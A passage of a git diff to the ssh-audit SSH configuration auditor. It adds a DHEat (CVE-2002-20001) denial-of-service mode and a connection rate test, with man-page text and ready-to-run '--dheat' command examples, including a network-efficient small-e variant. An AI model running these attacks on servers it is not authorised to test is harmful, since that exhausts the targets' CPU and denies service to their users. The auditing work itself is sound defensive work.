DHEat.dh_rate_test(out, aconf, kex, 1.5, 38, 3) + # This is a standard audit scan. if (aconf.policy is None) and (aconf.make_policy is False): - program_retval = output(out, aconf, banner, header, client_host=s.client_host, kex=kex, print_target=print_target) + program_retval = output(out, aconf, banner, header, client_host=s.client_host, kex=kex, print_target=print_target, dh_rate_test_notes=dh_rate_test_notes) # This is a policy test. elif (aconf.policy is not None) and (aconf.make_policy is False): @@ -1588,8 +1632,9 @@ def main() -> int: if __name__ == '__main__': # pragma: nocover - exit_code = exitcodes.GOOD + multiprocessing.freeze_support() # Needed for PyInstaller (Windows) builds. + exit_code = exitcodes.GOOD try: exit_code = main() except Exception: diff --git a/ssh-audit.1 b/ssh-audit.1 index 7f8265b..8008cc2 100644 --- a/ssh-audit.1 +++ b/ssh-audit.1 @@ -1,4 +1,4 @@ -.TH SSH-AUDIT 1 "March 14, 2024" +.TH SSH-AUDIT 1 "April 18, 2024" .SH NAME \fBssh-audit\fP \- SSH server & client configuration auditor .SH SYNOPSIS @@ -46,11 +46,21 @@ Enables grepable output. .br Starts a server on port 2222 to audit client software configuration. Use -p/--port= to change port and -t/--timeout= to change listen timeout. +.TP +.B \-\-conn\-rate\-test=N[:max_rate] +.br +Performs a connection rate test (useful for collecting metrics related to susceptibility of the DHEat vulnerability [CVE-2002-20001]). A successful connection is counted when the server returns a valid SSH banner. Testing is conducted with N concurrent sockets with an optional maximum rate of connections per second. + .TP .B -d, \-\-debug .br Enable debug output. +.TP +.B \-\-dheat=N[:kex[:e_len]] +.br +Run the DHEat DoS attack (CVE-2002-20001) against the target server (which will consume all available CPU resources). The number of concurrent sockets, N, needed to achieve this effect will be highly dependent on the CPU resources available on the target, as well as the latency between the source and target machines. The key exchange is automatically chosen based on which would cause maximum effect, unless explicitly chosen in the second field. Lastly, an (experimental) option allows the length in bytes of the fake e value sent to the server to be specified in the third field. Normally, the length of e is roughly the length of the modulus of the Diffie-Hellman exchange (hence, an 8192-bit / 1024-byte value of e is sent in each connection when targeting the diffie-hellman-group18-sha512 algorithm). Instead, it was observed that many SSH implementations accept small values, such as 4 bytes; this results in a much more network-efficient attack. + .TP .B -g, \-\-gex-test= .br @@ -126,6 +136,11 @@ The TCP port to connect to when auditing a server, or the port to listen on when .br Runs a policy audit against a target using the specified policy (see \fBPOLICY AUDIT\fP section for detailed description of this mode of operation). Combine with -c/--client-audit to audit a client configuration instead of a server. Use -L/--list-policies to list all official, built-in policies for common systems. +.TP +.B \-\-skip\-rate\-test +.br +Skips the connection rate test during standard audits. By default, a few dozen TCP connections are created with the target host to see if connection throttling is implemented (this can safely infer whether the target is vulnerable to the DHEat attack; see CVE-2002-20001). + .TP .B -t, \-\-timeout= .br @@ -273,6 +288,46 @@ ssh-audit targetserver --gex-test=0-5120:1024 .fi .RE +.LP +To run the DHEat DoS attack (monitor the target server's CPU usage to determine the optimal number of concurrent sockets): +.RS +.nf +ssh-audit targetserver --dheat=10 +.fi +.RE + +.LP +To run the DHEat attack and manually target the diffie-hellman-group-exchange-sha256 algorithm: +.RS +.nf +ssh-audit targetserver --dheat=10:diffie-hellman-group-exchange-sha256 +.fi +.RE + +.LP +To run the DHEat attack and manually target the diffie-hellman-group-exchange-sha256 algorithm with a very small length of e (resulting in the same effect but without having to send large packets): +.RS +.nf +ssh-audit targetserver --dheat=10:diffie-hellman-group-exchange-sha256:4 +.fi +.RE + +.LP +To test the number of successful connections per second that can be created with the target using 8 parallel threads (useful for detecting whether connection throttling is implemented by the target): +.RS +.nf +ssh-audit targetserver --conn-rate-test=8 +.fi +.RE + +.LP +To use 8 parallel threads to create up to 100 connections per second with the target (useful for understanding how much CPU load is caused on the target simply from handling new connections vs excess modular exponentiation when performing the DHEat attack): +.RS +.nf +ssh-audit targetserver --conn-rate-test=8:100 +.fi +.RE + .SH RETURN VALUES When a successful connection is made and all algorithms are rated as "good", \fBssh-audit\fP returns 0. Other possible return values are: diff --git a/ssh-audit.py b/ssh-audit.py index f0cf144..672cd5b 100755 --- a/ssh-audit.py +++ b/ssh-audit.py @@ -1,6 +1,7 @@ #!/usr/bin/env python3 """src/ssh_audit/ssh_audit.py wrapper for backwards compatibility""" +import multiprocessing import sys import traceback from pathlib import Path @@ -10,12 +11,14 @@ sys.path.insert(0, str(Path(__file__).resolve().parent / "src")) from ssh_audit.ssh_audit import main # noqa: E402 from ssh_audit import exitcodes # noqa: E402 -exit_code = exitcodes.GOOD +if __name__ == "__main__": + multiprocessing.freeze_support() # Needed for PyInstaller (Windows) builds. -try: - exit_code = main() -except Exception: - exit_code = exitcodes.UNKNOWN_ERROR - print(traceback.format_exc()) + exit_code = exitcodes.GOOD + try: + exit_code = main() + except Exception: + exit_code = exitcodes.UNKNOWN_ERROR + print(traceback.format_exc()) -sys.exit(exit_code) + sys.exit(exit_code) diff --git a/test/conftest.py b/test/conftest.py index e3878b1..d0b9604 100644 --- a/test/conftest.py +++ b/test/conftest.py @@ -73,6 +73,7 @@ class _VirtualSocket: self.rdata = [] self.sdata = [] self.errors = {} + self.blocking = False self.gsock = _VirtualGlobalSocket(self) def _check_err(self, method): @@ -83,12 +84,18 @@ class _VirtualSocket: def connect(self, address): return self._connect(address, False) + def connect_ex(self, address): + return self.connect(address) + def _connect(self, address, ret=True): self.peer_address = address self._connected = True self._check_err('connect') return self if ret else None + def setblocking(self, r: bool): + self.blocking = r + def settimeout(self, timeout): self.timeout = timeout diff --git a/test/docker/expected_results/dropbear_2019.78_test1.json b/test/docker/expected_results/dropbear_2019.78_test1.json index c8a6650..884ea8e 100644 --- a/test/docker/expected_results/dropbear_2019.78_test1.json +++ b/test/docker/expected_results/dropbear_2019.78_test1.json @@ -1,7 +1,5 @@ { - "additional_notes": [ - "" - ], + "additional_notes": [], "banner": { "comments": null, "protocol": "2.0", diff --git a/test/docker/expected_results/openssh_4.0p1_test1.json b/test/docker/expected_results/openssh_4.0p1_test1.json index f5735a9..e344739 100644 --- a/test/docker/expected_results/openssh_4.0p1_test1.json +++ b/test/docker/expected_results/openssh_4.0p1_test1.json @@ -1,7 +1,5 @@ { - "additional_notes": [ - "" - ], + "additional_notes": [], "banner": { "comments": null, "protocol": "1.99", diff --git a/test/docker/expected_results/openssh_5.6p1_test1.json b/test/docker/expected_results/openssh_5.6p1_test1.json index 53216e5..82ab274 100644 --- a/test/docker/expected_results/openssh_5.6p1_test1.json +++ b/test/docker/expected_results/openssh_5.6p1_test1.json @@ -1,7 +1,5 @@ { - "additional_notes": [ - "" - ], + "additional_notes": [], "banner": { "comments": null, "protocol": "2.0", diff --git a/test/docker/expected_results/openssh_5.6p1_test2.json b/test/docker/expected_results/openssh_5.6p1_test2.json index a1dd987..cbaa58b 100644 --- a/test/docker/expected_results/openssh_5.6p1_test2.json +++ b/test/docker/expected_results/openssh_5.6p1_test2.json @@ -1,7 +1,5 @@ { - "additional_notes": [ - "" - ], + "additional_notes": [], "banner": { "comments": null, "protocol": "2.0", diff --git a/test/docker/expected_results/openssh_5.6p1_test3.json b/test/docker/expected_results/openssh_5.6p1_test3.json index 2cbd316..a4ddada 100644 --- a/test/docker/expected_results/openssh_5.6p1_test3.json +++ b/test/docker/expected_results/openssh_5.6p1_test3.json @@ -1,7 +1,5 @@ { - "additional_notes": [ - "" - ], + "additional_notes": [], "banner": { "comments": null, "protocol": "2.0", diff --git a/test/docker/expected_results/openssh_5.6p1_test4.json b/test/docker/expected_results/openssh_5.6p1_test4.json index 90f5fc6..bba034c 100644 --- a/test/docker/expected_results/openssh_5.6p1_test4.json +++ b/test/docker/expected_results/openssh_5.6p1_test4.json @@ -1,7 +1,5 @@ { - "additional_notes": [ - "" - ], + "additional_notes": [], "banner": { "comments": null, "protocol": "2.0", diff --git a/test/docker/expected_results/openssh_5.6p1_test5.json b/test/docker/expected_results/openssh_5.6p1_test5.json index 0749cd1..8fb2542 100644 --- a/test/docker/expected_results/openssh_5.6p1_test5.json +++ b/test/docker/expected_results/openssh_5.6p1_test5.json @@ -1,7 +1,5 @@ { - "additional_notes": [ - "" - ], + "additional_notes": [], "banner": { "comments": null, "protocol": "2.0", diff --git a/test/docker/expected_results/openssh_8.0p1_test1.json b/test/docker/expected_results/openssh_8.0p1_test1.json index af08c5b..8f75e3c 100644 --- a/test/docker/expected_results/openssh_8.0p1_test1.json +++ b/test/docker/expected_results/openssh_8.0p1_test1.json @@ -1,7 +1,5 @@ { - "additional_notes": [ - "" - ], + "additional_notes": [], "banner": { "comments": null, "protocol": "2.0", diff --git a/test/docker/expected_results/openssh_8.0p1_test2.json b/test/docker/expected_results/openssh_8.0p1_test2.json index 1263a8d..3736883 100644 --- a/test/docker/expected_results/openssh_8.0p1_test2.json +++ b/test/docker/expected_results/openssh_8.0p1_test2.json @@ -1,7 +1,5 @@ { - "additional_notes": [ - "" - ], + "additional_notes": [], "banner": { "comments": null, "protocol": "2.0", diff --git a/test/docker/expected_results/openssh_8.0p1_test3.json b/test/docker/expected_results/openssh_8.0p1_test3.json index 6e96ae2..9ba52da 100644 --- a/test/docker/expected_results/openssh_8.0p1_test3.json +++ b/test/docker/expected_results/openssh_8.0p1_test3.json @@ -1,7 +1,5 @@ { - "additional_notes": [ - "" - ], + "additional_notes": [], "banner": { "comments": null, "protocol": "2.0", diff --git a/test/docker/expected_results/tinyssh_20190101_test1.json b/test/docker/expected_results/tinyssh_20190101_test1.json index 4b54a86..e0efe0b 100644 --- a/test/docker/expected_results/tinyssh_20190101_test1.json +++ b/test/docker/expected_results/tinyssh_20190101_test1.json @@ -1,7 +1,5 @@ { - "additional_notes": [ - "" - ], + "additional_notes": [], "banner": { "comments": "", "protocol": "2.0", diff --git a/test/test_dheater.py b/test/test_dheater.py new file mode 100644 index 0000000..a64da8f --- /dev/null +++ b/test/test_dheater.py @@ -0,0 +1,29 @@ +import pytest + +from ssh_audit.ssh2_kexdb import SSH2_KexDB +from ssh_audit.dheat import DHEat + + +class TestDHEat: + + @pytest.fixture(autouse=True) + def init(self): + self.SSH2_KexDB = SSH2_KexDB + self.DHEat = DHEat + + def test_kex_definition_completeness(self): + alg_db = self.SSH2_KexDB.get_db() + kex_db = alg_db['kex'] + + # Get all Diffie-Hellman algorithms defined in our database. + dh_algs = [] + for kex in kex_db: + if kex.startswith('diffie-hellman-'): + dh_algs.append(kex) + + # Ensure that each DH algorithm in our database is in either DHEat's alg_priority or gex_algs list. Also ensure that all non-group exchange algorithms are accounted for in the alg_modulus_sizes dictionary. + for dh_alg in dh_algs: + assert (dh_alg in self.DHEat.alg_priority) or (dh_alg in self.DHEat.gex_algs) + + if dh_alg.find("group-exchange") == -1: + assert dh_alg in self.DHEat.alg_modulus_sizes diff --git a/test/test_errors.py b/test/test_errors.py index 90cfd1c..ad56a29 100644 --- a/test/test_errors.py +++ b/test/test_errors.py @@ -17,6 +17,7 @@ class TestErrors: conf = self.AuditConf('localhost', 22) conf.colors = False conf.batch = True + conf.skip_rate_test = True return conf def _audit(self, spy, conf=None, exit_expected=False): diff --git a/test/test_ssh1.py b/test/test_ssh1.py index 96e8846..e7000e8 100644 --- a/test/test_ssh1.py +++ b/test/test_ssh1.py @@ -33,6 +33,7 @@ class TestSSH1: conf.verbose = True conf.ssh1 = True conf.ssh2 = False + conf.skip_rate_test = True return conf def _create_ssh1_packet(self, payload, valid_crc=True): diff --git a/test/test_ssh2.py b/test/test_ssh2.py index 9c737b5..f610310 100644 --- a/test/test_ssh2.py +++ b/test/test_ssh2.py @@ -32,6 +32,7 @@ class TestSSH2: conf.verbose = True conf.ssh1 = False conf.ssh2 = True + conf.skip_rate_test = True return conf @classmethod diff --git a/tox.ini b/tox.ini index 50fccd0..b06c290 100644 --- a/tox.ini +++ b/tox.ini @@ -101,11 +101,14 @@ disable = no-else-return, super-with-arguments, # Can be re-factored, at some point. too-complex, + too-many-arguments, too-many-boolean-expressions, too-many-branches, too-many-instance-attributes, too-many-lines, too-many-locals, + too-many-nested-blocks, + too-many-return-statements, too-many-statements, consider-using-f-string max-complexity = 15